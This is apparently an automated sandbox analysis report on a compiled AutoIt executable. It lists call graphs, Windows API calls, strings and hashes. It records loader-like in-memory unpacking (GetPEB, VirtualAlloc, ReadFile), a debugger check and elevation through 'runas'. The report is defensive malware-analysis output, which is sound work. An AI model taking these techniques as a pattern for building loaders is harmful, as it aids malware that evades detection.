88426 451b42 61 API calls 88370->88426 88373 4797c7 88371->88373 88374 4797e3 88371->88374 88427 451b42 61 API calls 88373->88427 88404 441eba 88374->88404 88376 4797b5 88376->88344 88378 4797f7 88380 479815 88378->88380 88381 4797fe 88378->88381 88379 4797da 88379->88344 88385 47983c 88380->88385 88409 451d2b 88380->88409 88428 451b42 61 API calls 88381->88428 88383 47980c 88383->88344 88389 4798e6 88385->88389 88420 479714 88385->88420 88386 47994b VariantInit 88389->88386 88390 479916 VariantClear 88389->88390 88390->88389 88405 441f12 88404->88405 88406 441ecc _wcslen 88404->88406 88405->88378 88406->88405 88407 410160 52 API calls 88406->88407 88408 441ede 88407->88408 88408->88378 88410 451d5e 88409->88410 88421 479728 88420->88421 88426->88376 88427->88379 88428->88383 88433->88369 88494 4289d2 88493->88494 88495 408db3 88493->88495 88523 45e737 90 API calls 3 library calls 88494->88523 88519 40bec0 88495->88519 88498 4289e5 88524 45e737 90 API calls 3 library calls 88498->88524 88499 408dc9 88499->88498 88501 40ba10 52 API calls 88499->88501 88502 428a05 88499->88502 88504 40a780 197 API calls 88499->88504 88505 408e64 88499->88505 88507 408f40 VariantClear 88499->88507 88508 408e5a 88499->88508 88501->88499 88503 408f40 VariantClear 88502->88503 88503->88508 88504->88499 88506 408f40 VariantClear 88505->88506 88506->88508 88507->88499 88508->87993 88510 408f40 VariantClear 88509->88510 88511 403d20 88510->88511 88512 403cd0 VariantClear 88511->88512 88513 403d4d 88512->88513 88526 4755ad 88513->88526 88529 46f8cb 88513->88529 88548 477145 88513->88548 88514 403d76 88514->87990 88514->88001 88518->87990 88520 40bed0 88519->88520 88521 40bef2 88520->88521 88525 45e737 90 API calls 3 library calls 88520->88525 88521->88499 88523->88498 88524->88502 88525->88521 88553 475077 88526->88553 88528 4755c0 88528->88514 88530 46f8e7 88529->88530 88531 46f978 88529->88531 88532 46f900 88530->88532 88533 46f93c 88530->88533 88534 46f91a 88530->88534 88540 46f8ee 88530->88540 88531->88514 88536 45340c 85 API calls 88532->88536 88535 45340c 85 API calls 88533->88535 88537 45340c 85 API calls 88534->88537 88538 46f958 88535->88538 88536->88540 88541 46f931 88537->88541 88542 45340c 85 API calls 88538->88542 88539 45340c 85 API calls 88543 46f971 88539->88543 88540->88539 88544 45340c 85 API calls 88541->88544 88545 46f95f 88542->88545 88656 46cb5f 88543->88656 88544->88540 88547 45340c 85 API calls 88545->88547 88547->88540 88549 408e80 VariantClear 88548->88549 88550 47715a 88549->88550 88706 467ac4 88550->88706 88552 477160 88552->88514 88604 4533eb 88553->88604 88556 4750ee 88558 408f40 VariantClear 88556->88558 88557 475129 88608 4646e0 88557->88608 88565 4750f5 88558->88565 88560 47515e 88561 475162 88560->88561 88571 47518e 88560->88571 88565->88528 88605 453404 88604->88605 88606 4533f8 88604->88606 88605->88556 88605->88557 88606->88605 88650 4531b1 85 API calls 5 library calls 88606->88650 88651 4536f7 53 API calls 88608->88651 88610 4646fc 88652 4426cd 59 API calls _wcslen 88610->88652 88612 464711 88614 40bc70 52 API calls 88612->88614 88620 46474b 88612->88620 88615 46472c 88614->88615 88653 461465 52 API calls _memmove 88615->88653 88617 464741 88619 464793 88619->88560 88620->88619 88654 463ad5 64 API calls __wcsicoll 88620->88654 88650->88605 88651->88610 88652->88612 88653->88617 88654->88619 88657 40bc70 52 API calls 88656->88657 88658 46cb7e 88657->88658 88659 40bc70 52 API calls 88658->88659 88660 46cb86 88659->88660 88661 40bc70 52 API calls 88660->88661 88662 46cb91 88661->88662 88663 408f40 VariantClear 88662->88663 88707 467adc 88706->88707 88719 467bb8 88706->88719 88708 467c1d 88707->88708 88709 467c16 88707->88709 88710 467b90 88707->88710 88721 467aed 88707->88721 88712 4115d7 52 API calls 88708->88712 88728 40e270 VariantClear moneypunct 88709->88728 88713 4115d7 52 API calls 88710->88713 88714 467b75 _memmove 88712->88714 88713->88714 88717 4115d7 52 API calls 88714->88717 88715 467b28 moneypunct 88715->88708 88715->88714 88716 467b55 88715->88716 88718 4115d7 52 API calls 88716->88718 88717->88719 88720 467b5b 88718->88720 88719->88552 88726 442ee0 52 API calls 88720->88726 88721->88715 88723 4115d7 52 API calls 88721->88723 88723->88715 88724 467b6b 88727 45f645 54 API calls moneypunct 88724->88727 88726->88724 88727->88714 88728->88708 88729->88011 88730->88106 88731->88025 88732->88071 88733->88071 88734->88045 88735->88069 88736->88035 88737->88039 88738->88041 88739->88105 88740->88105 88741->88059 88742->88078 88743->88062 88744->88093 88745->88113 88746->88113 88747->88106 88748->88117 88749->88133 88750->88124 88751->88131 88752->88139 88753->88139 88754->88078 88755 42d154 88759 480a8d 88755->88759 88757 42d161 88758 480a8d 197 API calls 88757->88758 88758->88757 88760 480ae4 88759->88760 88761 480b26 88759->88761 88763 480aeb 88760->88763 88764 480b15 88760->88764 88762 40bc70 52 API calls 88761->88762 88788 480b2e 88762->88788 88766 480aee 88763->88766 88767 480b04 88763->88767 88792 4805bf 197 API calls 88764->88792 88766->88761 88769 480af3 88766->88769 88791 47fea2 197 API calls __itow_s 88767->88791 88790 47f135 197 API calls 88769->88790 88770 40e0a0 52 API calls 88770->88788 88773 408f40 VariantClear 88775 481156 88773->88775 88774 480aff 88774->88773 88777 408f40 VariantClear 88775->88777 88776 40c2c0 52 API calls 88776->88788 88778 48115e 88777->88778 88778->88757 88779 480ff5 88797 45e737 90 API calls 3 library calls 88779->88797 88780 401980 53 API calls 88780->88788 88782 40e710 53 API calls 88782->88788 88783 40a780 197 API calls 88783->88788 88785 408e80 VariantClear 88785->88788 88787 40e830 53 API calls 88787->88788 88788->88770 88788->88774 88788->88776 88788->88779 88788->88780 88788->88782 88788->88783 88788->88785 88788->88787 88793 45377f 52 API calls 88788->88793 88794 45e951 53 API calls 88788->88794 88795 47925f 53 API calls 88788->88795 88796 47fcff 197 API calls 88788->88796 88790->88774 88791->88774 88792->88774 88793->88788 88794->88788 88795->88788 88796->88788 88797->88774 88798 3ec0dcb 88801 3ec0a40 88798->88801 88800 3ec0e17 88814 3ebe470 88801->88814 88804 3ec0b10 CreateFileW 88805 3ec0adf 88804->88805 88808 3ec0b1d 88804->88808 88806 3ec0b39 VirtualAlloc 88805->88806 88805->88808 88812 3ec0c40 CloseHandle 88805->88812 88813 3ec0c50 VirtualFree 88805->88813 88817 3ec1950 GetPEB 88805->88817 88807 3ec0b5a ReadFile 88806->88807 88806->88808 88807->88808 88811 3ec0b78 VirtualAlloc 88807->88811 88809 3ec0d2c VirtualFree 88808->88809 88810 3ec0d3a 88808->88810 88809->88810 88810->88800 88811->88805 88811->88808 88812->88805 88813->88805 88816 3ebeafb 88814->88816 88819 3ec18f0 GetPEB 88814->88819 88816->88805 88818 3ec197a 88817->88818 88818->88804 88819->88816 88820 42b14b 88827 40bc10 88820->88827 88822 42b159 88823 4096a0 328 API calls 88822->88823 88824 42b177 88823->88824 88838 44b92d VariantClear 88824->88838 88826 42bc5b 88828 40bc24 88827->88828 88829 40bc17 88827->88829 88831 40bc2a 88828->88831 88832 40bc3c 88828->88832 88830 408e80 VariantClear 88829->88830 88833 40bc1f 88830->88833 88834 408e80 VariantClear 88831->88834 88835 4115d7 52 API calls 88832->88835 88833->88822 88836 40bc33 88834->88836 88837 40bc43 88835->88837 88836->88822 88837->88822 88838->88826 88839 425b2b 88844 40f000 88839->88844 88843 425b3a 88845 4115d7 52 API calls 88844->88845 88846 40f007 88845->88846 88847 4276ea 88846->88847 88853 40f030 88846->88853 88852 41130a 51 API calls __cinit 88852->88843 88854 40f039 88853->88854 88855 40f01a 88853->88855 88883 41130a 51 API calls __cinit 88854->88883 88857 40e500 88855->88857 88858 40bc70 52 API calls 88857->88858 88859 40e515 GetVersionExW 88858->88859 88860 402160 52 API calls 88859->88860 88861 40e557 88860->88861 88884 40e660 88861->88884 88867 427674 88870 4276c6 GetSystemInfo 88867->88870 88869 40e5cd GetCurrentProcess 88905 40ef20 LoadLibraryA GetProcAddress 88869->88905 88872 4276d5 GetSystemInfo 88870->88872 88875 40e629 88902 40ef90 88875->88902 88876 40e5e0 88876->88872 88898 40efd0 88876->88898 88879 40e641 FreeLibrary 88880 40e644 88879->88880 88881 40e653 FreeLibrary 88880->88881 88882 40e656 88880->88882 88881->88882 88882->88852 88883->88855 88885 40e667 88884->88885 88886 42761d 88885->88886 88887 40c600 52 API calls 88885->88887 88888 40e55c 88887->88888 88889 40e680 88888->88889 88890 40e687 88889->88890 88891 427616 88890->88891 88892 40c600 52 API calls 88890->88892 88893 40e566 88892->88893 88893->88867 88894 40ef60 88893->88894 88895 40e5c8 88894->88895 88896 40ef66 LoadLibraryA 88894->88896 88895->88869 88895->88876 88896->88895 88897 40ef77 GetProcAddress 88896->88897 88897->88895 88899 40e620 88898->88899 88900 40efd6 LoadLibraryA 88898->88900 88899->88870 88899->88875 88900->88899 88901 40efe7 GetProcAddress 88900->88901 88901->88899 88906 40efb0 LoadLibraryA GetProcAddress 88902->88906 88904 40e632 GetNativeSystemInfo 88904->88879 88904->88880 88905->88876 88906->88904 88907 425b5e 88912 40c7f0 88907->88912 88911 425b6d 88947 40db10 52 API calls 88912->88947 88914 40c82a 88948 410ab0 6 API calls 88914->88948 88916 40c86d 88917 40bc70 52 API calls 88916->88917 88918 40c877 88917->88918 88919 40bc70 52 API calls 88918->88919 88920 40c881 88919->88920 88921 40bc70 52 API calls 88920->88921 88922 40c88b 88921->88922 88923 40bc70 52 API calls 88922->88923 88924 40c8d1 88923->88924 88925 40bc70 52 API calls 88924->88925 88926 40c991 88925->88926 88949 40d2c0 52 API calls 88926->88949 88928 40c99b 88950 40d0d0 53 API calls 88928->88950 88930 40c9c1 88931 40bc70 52 API calls 88930->88931 88932 40c9cb 88931->88932 88951 40e310 53 API calls 88932->88951 88934 40ca28 88935 408f40 VariantClear 88934->88935 88936 40ca30 88935->88936 88937 408f40 VariantClear 88936->88937 88938 40ca38 GetStdHandle 88937->88938 88939 429630 88938->88939 88940 40ca87 88938->88940 88939->88940 88941 429639 88939->88941 88946 41130a 51 API calls __cinit 88940->88946 88952 4432c0 57 API calls 88941->88952 88943 429641 88953 44b6ab CreateThread 88943->88953 88945 42964f CloseHandle 88945->88940 88946->88911 88947->88914 88948->88916 88949->88928 88950->88930 88951->88934 88952->88943 88953->88945 88954 44b5cb 58 API calls 88953->88954 88955 3ec0820 88956 3ebe470 GetPEB 88955->88956 88957 3ec08cb 88956->88957 88969 3ec0710 88957->88969 88970 3ec0719 Sleep 88969->88970 88971 3ec0727 88970->88971 88972 425b6f 88977 40dc90 88972->88977 88976 425b7e 88978 40bc70 52 API calls 88977->88978 88979 40dd03 88978->88979 88985 40f210 88979->88985 88982 40dd96 88983 40ddb7 88982->88983 88988 40dc00 52 API calls 2 library calls 88982->88988 88984 41130a 51 API calls __cinit 88983->88984 88984->88976 88989 40f250 RegOpenKeyExW 88985->88989 88987 40f230 88987->88982 88988->88982 88990 425e17 88989->88990 88991 40f275 RegQueryValueExW 88989->88991 88990->88987 88992 40f2c3 RegCloseKey 88991->88992 88993 40f298 88991->88993 88992->88987 88994 40f2a9 RegCloseKey 88993->88994 88995 425e1d 88993->88995 88994->88987

                                                                        Executed Functions

                                                                        Function 004096A0 Relevance: 33.9, APIs: 21, Instructions: 2413COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _wcslen.LIBCMT ref: 004096C1
                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                        • _memmove.LIBCMT ref: 0040970C
                                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                          • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                        • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
                                                                        • _memmove.LIBCMT ref: 00409D96
                                                                        • _memmove.LIBCMT ref: 0040A6C4
                                                                        • _memmove.LIBCMT ref: 004297E5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
                                                                        • String ID:
                                                                        • API String ID: 2383988440-0
                                                                        • Opcode ID: c3d1726ec1bf21ff344278e3f3d6c1e2cb60dcce04ae326530f188bd7e2b315d
                                                                        • Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
                                                                        • Opcode Fuzzy Hash: c3d1726ec1bf21ff344278e3f3d6c1e2cb60dcce04ae326530f188bd7e2b315d
                                                                        • Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B
                                                                        Function 0040D590 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 144windowCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
                                                                          • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
                                                                          • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
                                                                          • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
                                                                          • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
                                                                          • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
                                                                          • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
                                                                        • IsDebuggerPresent.KERNEL32 ref: 0040D5B6
                                                                        • GetFullPathNameW.KERNEL32(004A7F6C,00000104,?,004A7F50,004A7F54), ref: 0040D625
                                                                          • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
                                                                        • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
                                                                        • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
                                                                        • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
                                                                        • ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
                                                                          • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                                          • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                                          • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
                                                                          • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                                          • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                                          • Part of subcall function 00410390: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                                          • Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D
                                                                          • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                                          • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                                          • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
                                                                          • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
                                                                          • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                                        Strings
                                                                        • This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support., xrefs: 0042E1C2
                                                                        • runas, xrefs: 0042E2AD, 0042E2DC
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcscpy
                                                                        • String ID: This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                                        • API String ID: 2495805114-3383388033
                                                                        • Opcode ID: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                                                                        • Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
                                                                        • Opcode Fuzzy Hash: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                                                                        • Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D
                                                                        Function 0046CB5F Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 304comCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1515 46cb5f-46cbc3 call 40bc70 * 3 call 408f40 1524 46cbd4-46cbe7 CLSIDFromProgID 1515->1524 1525 46cbc5-46cbcd OleInitialize 1515->1525 1526 46cc33-46cc47 1524->1526 1527 46cbe9-46cbf9 CLSIDFromString 1524->1527 1525->1524 1528 46cca6-46ccba call 458651 1526->1528 1529 46cc49-46cc60 CoCreateInstance 1526->1529 1527->1526 1530 46cbfb-46cc05 1527->1530 1532 46cc96-46cca1 1528->1532 1539 46ccbc-46ccf7 CoInitializeSecurity call 412f40 call 4311fc 1528->1539 1529->1532 1533 46cc62-46cc8b call 43119b 1529->1533 1534 46cc06-46cc30 call 451b42 call 402250 * 3 1530->1534 1532->1534 1550 46cc8e-46cc90 1533->1550 1553 46cdf4 1539->1553 1554 46ccfd-46cd1f call 402160 call 431a2b 1539->1554 1550->1532 1551 46ceb7-46cef0 call 468070 call 402250 * 3 1550->1551 1555 46cdfa-46ce4a call 412f40 CoCreateInstanceEx CoTaskMemFree 1553->1555 1569 46cd35-46cd47 call 465177 1554->1569 1570 46cd21-46cd33 1554->1570 1555->1532 1564 46ce50-46ce55 1555->1564 1564->1532 1568 46ce5b-46ce62 1564->1568 1573 46ce64-46ce8b CoSetProxyBlanket 1568->1573 1574 46ce8d-46ce9e 1568->1574 1582 46cd4a-46cda3 call 40e0a0 call 402250 call 46150f call 40e0a0 call 402250 1569->1582 1575 46cda5-46cdaa 1570->1575 1573->1574 1574->1550 1578 46cea4-46ceb2 1574->1578 1579 46cdac-46cdbb call 4111c1 1575->1579 1580 46cdbd-46cdc0 1575->1580 1578->1534 1581 46cdc3-46cdf2 1579->1581 1580->1581 1581->1555 1582->1575
                                                                        APIs
                                                                        • OleInitialize.OLE32(00000000), ref: 0046CBC7
                                                                        • CLSIDFromProgID.COMBASE(?,?), ref: 0046CBDF
                                                                        • CLSIDFromString.OLE32(?,?), ref: 0046CBF1
                                                                        • CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
                                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
                                                                        • _wcslen.LIBCMT ref: 0046CDB0
                                                                        • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
                                                                        • CoTaskMemFree.OLE32(?), ref: 0046CE42
                                                                        • CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
                                                                          • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
                                                                          • Part of subcall function 00468070: VariantCopy.OLEAUT32(00000000,00479A50), ref: 004680BA
                                                                          • Part of subcall function 00468070: VariantClear.OLEAUT32 ref: 004680C7
                                                                        Strings
                                                                        • NULL Pointer assignment, xrefs: 0046CEA6
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$CreateFromInitializeInstance$BlanketClearCopyFreeInitProgProxySecurityStringTask_wcslen
                                                                        • String ID: NULL Pointer assignment
                                                                        • API String ID: 440038798-2785691316
                                                                        • Opcode ID: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                                        • Instruction ID: 7aab634462a7dbcbf958abac95e41bd58996b502d0213671d322085b5631b432
                                                                        • Opcode Fuzzy Hash: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                                        • Instruction Fuzzy Hash: 74B13FB1D00229AFDB10DFA5CC85FEEB7B8EF48700F10855AF909A7281EB745A45CB95
                                                                        Function 0040E500 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 157COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1986 40e500-40e57c call 40bc70 GetVersionExW call 402160 call 40e660 call 40e680 1995 40e582-40e583 1986->1995 1996 427674-427679 1986->1996 1999 40e585-40e596 1995->1999 2000 40e5ba-40e5cb call 40ef60 1995->2000 1997 427683-427686 1996->1997 1998 42767b-427681 1996->1998 2002 427693-427696 1997->2002 2003 427688-427691 1997->2003 2001 4276b4-4276be 1998->2001 2004 427625-427629 1999->2004 2005 40e59c-40e59f 1999->2005 2017 40e5ec-40e60c 2000->2017 2018 40e5cd-40e5e6 GetCurrentProcess call 40ef20 2000->2018 2019 4276c6-4276ca GetSystemInfo 2001->2019 2002->2001 2009 427698-4276a8 2002->2009 2003->2001 2011 427636-427640 2004->2011 2012 42762b-427631 2004->2012 2007 40e5a5-40e5ae 2005->2007 2008 427654-427657 2005->2008 2013 40e5b4 2007->2013 2014 427645-42764f 2007->2014 2008->2000 2020 42765d-42766f 2008->2020 2015 4276b0 2009->2015 2016 4276aa-4276ae 2009->2016 2011->2000 2012->2000 2013->2000 2014->2000 2015->2001 2016->2001 2022 40e612-40e623 call 40efd0 2017->2022 2023 4276d5-4276df GetSystemInfo 2017->2023 2018->2017 2030 40e5e8 2018->2030 2019->2023 2020->2000 2022->2019 2027 40e629-40e63f call 40ef90 GetNativeSystemInfo 2022->2027 2032 40e641-40e642 FreeLibrary 2027->2032 2033 40e644-40e651 2027->2033 2030->2017 2032->2033 2034 40e653-40e654 FreeLibrary 2033->2034 2035 40e656-40e65d 2033->2035 2034->2035
                                                                        APIs
                                                                        • GetVersionExW.KERNEL32(?), ref: 0040E52A
                                                                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                        • GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
                                                                        • GetNativeSystemInfo.KERNELBASE(?), ref: 0040E632
                                                                        • FreeLibrary.KERNEL32(?), ref: 0040E642
                                                                        • FreeLibrary.KERNEL32(?), ref: 0040E654
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
                                                                        • String ID: 0SH$Wu
                                                                        • API String ID: 3363477735-1135818761
                                                                        • Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                                        • Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
                                                                        • Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                                        • Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
                                                                        Function 0040EBD0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
                                                                        • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: IsThemeActive$uxtheme.dll
                                                                        • API String ID: 2574300362-3542929980
                                                                        • Opcode ID: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                                        • Instruction ID: d0aec1e7cdd3fc231052cfb2f432bc7d0e698e699ac1f50efe2d89ca8b78c0bc
                                                                        • Opcode Fuzzy Hash: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                                        • Instruction Fuzzy Hash: D6D0C7B49407039AD7305F71C91871B76E47B50751F104C3DF946A1294DB7CD040D768
